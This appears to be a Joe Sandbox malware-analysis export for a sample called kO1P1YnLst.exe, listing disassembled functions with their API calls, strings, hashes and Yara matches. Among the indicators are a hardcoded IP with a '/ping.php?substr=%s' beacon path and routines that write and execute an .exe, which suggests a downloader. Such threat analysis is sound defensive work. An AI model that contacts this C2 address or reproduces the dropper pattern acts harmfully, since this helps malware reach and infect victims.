Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05BF352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kO1P1YnLst.exe,00000104), ref: 05BF356A
_free.LIBCMT ref: 05BF3635
_free.LIBCMT ref: 05BF363F

Strings

C:\Users\user\Desktop\kO1P1YnLst.exe, xrefs: 05BF3561, 05BF3568, 05BF3597, 05BF35CF

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\kO1P1YnLst.exe
API String ID: 2506810119-4186412371
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: c7845ac3f298bf1f7ccb365e4a4b77f37dd050676a5f85af6603dc80940e7caf
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 5D3173B1A04258BFDB21DF99DC84DAEBBFDEB84710F1444E6EA0597310D770AA49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kO1P1YnLst.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\kO1P1YnLst.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\kO1P1YnLst.exe
API String ID: 2506810119-4186412371
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 05C06777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 05C067B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 05C067CD
CloseHandle.KERNEL32(?), ref: 05C067D6

Strings

.exe, xrefs: 05C06782

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: efca40608fd516ec2fdd4feb011977f813a59722d903c863f7b58313512d43ac
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 65015631E00218EBDF15DFA9E8459EDBBB8FF08640F408126E801A6260EB709A85CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05C064A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,05C05B74,00000001,?,/ping.php?substr=%s), ref: 05C064C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,05C05B74,00000001,?,/ping.php?substr=%s,?), ref: 05C064DC
CloseHandle.KERNEL32(00000000,?,05C05B74,00000001,?,/ping.php?substr=%s,?), ref: 05C064E5

Strings

.exe, xrefs: 05C064AE

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1eab40d427e7215f09cb16605276472919f6ab58c288ed3f41a669d573aa85c1
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 80E06572601124BBD7311B999C48FA7BE6CEF855A0F040125FB05D21509661DD0197B4

Uniqueness

Uniqueness Score: -1.00%

Function 05BF7FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 05BF8061
__alldvrm.LIBCMT ref: 05BF8262
__alldvrm.LIBCMT ref: 05BF8284

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: 71932a15b51f71e9a50e09091aeeaa109684c889829b5e88ffc3d19b5dcc8382
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 9BA14832A047869FDB25CF28C881BBEBBE5FF15350F1446E9E6959B281C234B949C750

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 05C02AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05C02C05

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: e662bfb2e82600fa7e817f398c3b3dba0d06f081dccd6d7efaf5c2682eaeaaff
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: 55413939B006056ADB217EBCCC8CE7E7AAAFF01330F141A95F919D61D0DAB496448361

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 05BFB567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,05BF4002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 05BFB5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05BFB63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05BFB64F
__freea.LIBCMT ref: 05BFB658

Part of subcall function 05BF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BF7CDE

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: 6ec1c4d5cacdd9058bec82e37dabf37fda4ea9de5c9150bc28512ee35cefb7df
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: 68319072A0020AABDF259F65DC45DBEBBA5FF40610F0801A9FD19D7150EB35ED68CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05BECF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 05BECF2B

Part of subcall function 05BECE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05BECEA7
Part of subcall function 05BECE78: ___AdjustPointer.LIBCMT ref: 05BECEC2

_UnwindNestedFrames.LIBCMT ref: 05BECF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05BECF51
CallCatchBlock.LIBVCRUNTIME ref: 05BECF79

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: c7764aeb709dc2dfa57d7519db61693e3a7f615bf570000648f592b1c77fd739
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 3B012D32200108BBCF116E95CC48EEB7FA9FF59754F084158FE08A6120D731E8619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05BF74BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05BEED94,00000000,00000000,?,05BF7461,05BEED94,00000000,00000000,00000000,?,05BF7719,00000006,0042F348), ref: 05BF74EC
GetLastError.KERNEL32(?,05BF7461,05BEED94,00000000,00000000,00000000,?,05BF7719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,05BF7052), ref: 05BF74F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05BF7461,05BEED94,00000000,00000000,00000000,?,05BF7719,00000006,0042F348,0042F340,0042F348,00000000), ref: 05BF7506

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: f34c2cab7e93d478c042606955a35878362582c732323907d09f3caa7daeed38
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 4401D4367552279BD7318B68AC48E667B9AFF046A1B5005B0FB0AD3180DF60E905C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

.A, xrefs: 0041DE13
, xrefs: 0041DE66

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05BEA937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 05BEA96A
__IsNonwritableInCurrentImage.LIBCMT ref: 05BEAA23

Strings

csm, xrefs: 05BEAA0D

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 586ccafea7b72da21f62eda7f78749bfb17c4a6cfdb6b5482d791c9ef778ee92
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: 8E41D434A002499BCF10DF68C888AAEBBB9FF45314F1881D5E8166B391D775B955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05BFFFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 05C000D4

Strings

ACP, xrefs: 05C00017
OCP, xrefs: 05C0004D

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: ec356caa83a0f078e2333b401769254594a3460803aef70702736f5e664f3851
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 6821C462B00104A6EB348B55C909FA7726BBB44B19F879C65EA0AF7180F736DB40C354

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D

Strings

OCP, xrefs: 0041FDE6
ACP, xrefs: 0041FDB0

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 05C062B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C062B6

Part of subcall function 05BE1E19: __EH_prolog.LIBCMT ref: 05BE1E1E

Part of subcall function 05BE266A: __EH_prolog.LIBCMT ref: 05BE266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05C06398

Strings

,jC, xrefs: 05C0638D

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 4d0e5f9a7e916074849886094a9c29da1c25fe036e37a5cdf02d159624c78700
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 7831D8B5E01119EFDB14DF98D985AEDF7B4FF48204F1485AAE405A3640DB74AA48CF60

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 05BE37D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BE37DB

Strings

185.172.128.228, xrefs: 05BE37E2
/ping.php?substr=%s, xrefs: 05BE37E3

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 96046127c19045e817f101f3668bca0fd5e485451832215a7eb55330ac61581d
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 3B01A972A05115ABDB04DF989C44BAEB7B9FF44610F18056AF805E3280E3B4BA40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

185.172.128.228, xrefs: 0040357B
/ping.php?substr=%s, xrefs: 0040357C

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 05BFA93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05BFA9D1
GetLastError.KERNEL32 ref: 05BFA9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05BFAA3A

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
